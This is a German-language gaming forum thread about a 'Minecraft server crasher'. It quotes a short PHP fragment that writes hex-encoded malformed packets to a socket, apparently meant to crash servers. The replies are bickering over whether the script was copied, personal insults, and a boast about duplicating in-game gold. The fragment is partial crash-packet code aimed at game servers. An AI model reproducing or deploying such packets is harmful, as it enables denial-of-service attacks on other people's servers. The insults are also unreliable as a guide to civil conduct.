Minecraft Server Crasher [Online]

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • Werbung zur Unterstützung des Forums ( Bitte AddBlocker deaktivieren )

  • yannickmama;225917 schrieb:

    fwrite($fp, hextostr('1000FF010a'));
    fwrite($fp, hextostr('c000002ac0000000009cd0ad70fe163dd90006ffffff52000000400000004b18000000015effffdb0f00000'));
    fwrite($fp, hextostr('0100002ac0000000009cd0ad70fe163dd90006ffffff52000000400000004b18000000015effffdb0f00000'));
    fwrite($fp, hextostr('FF00FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF'));

    Schaut mir jetzt nicht nach einer floodattacke aus :D

    Notch hat aber schon eine E-Mail von mir ob er an einer zusammenarbeit mit mir interessiert ist (gibt in fast jeder vom user beeinflussbaren funktion einige fehler).
    Geld hat er ja genug :p



    War das nicht bei Flyff auch schon dein Wunsch ?

    Denkst du ernsthaft, die stellen jeden ein (bzw arbeiten mit dem zusammen) der sich nen Sniffer nehmen kann, bisschen rumprobiert und dadurch evt mal zu einem erfolg kommt ? Das ist einfach lächerlich.

    Es wurden genug Crash Packets released, ich bin mir fast sicher das deins auch Leeched von Hackhound ist ...

    Bleib nur weiter in deiner Welt aus Einsamkeit und Hass in Verbindung mit einer Persönlichkeitsstörung.
    Ehrlich, selbst wenn Notch eventuell sogar deine Mail liest (was sehr unwahrscheinlich ist) wird er nix weiter
    machen als darüber zu schmunzeln und den "Löschen" Button drücken.

    Vorausgesetzt ist, dass er dein Englisch überhaupt verstehen kann...
  • Synaptic;225921 schrieb:

    Es wurden genug Crash Packets released, ich bin mir fast sicher das deins auch Leeched von Hackhound ist ...



    Ohnein wieso erwischst du mich immer beim leechen????

    Ich hätte jetzt ehrlich gedacht das ich endlich was leechen kann und du es nicht herausfindest. Naja wenn die katze schon aus dem Sack ist:

    Das Script hab ich auch nicht geschrieben :(. In ehrlichkeit hat es mein Fachinformatik freund Klaus geschrieben. Problem ist aber er will immer mehr Geld von mir dafür das er was in meinem Namen codet. Deswegen nur noch ein mageres PHP Script :(.

    Ich finds aber nicht cool das du mich fertig machst als Moderator. Ich meine ich blicke tag für tag auf dich hinauf. Ich find deine Taten total Respektwürdig und das du solch eine Positiveingestellte meinung hast über Demonflyff die alles selber coden und nicht klauen (z.b Website, Cashshop und die tollen Ideen im Game selbst die sie niemals von AScension geklaut haben.).

    Wann erwiederst du aber endlich meinen Respekt dir gegenüber? Ich will doch einfach meinen Freunden erzählen können das ich dich als Freund habe. Einfach mal sagen könne: "Hey leute! Synaptic ist mein Freund. Er kann richtig cool coden und ist sonst auch besser als alles andere".
  • Synaptic;225921 schrieb:

    War das nicht bei Flyff auch schon dein Wunsch ?

    Denkst du ernsthaft, die stellen jeden ein (bzw arbeiten mit dem zusammen) der sich nen Sniffer nehmen kann, bisschen rumprobiert und dadurch evt mal zu einem erfolg kommt ? Das ist einfach lächerlich.


    Wer sagt das ich kein Erfolg bei Flyff hatte ? q.q

    Hab sogar mal mit dem Chef von Aeonsoft geschrieben der ein paar Ratschlägen von mir angenommen hat :ooo

    @Apfelschorle

    Ich weis nicht ob man Dupen kann. Hab aber gestern 2 gold in dem spiel geduped!!!!!!!!1111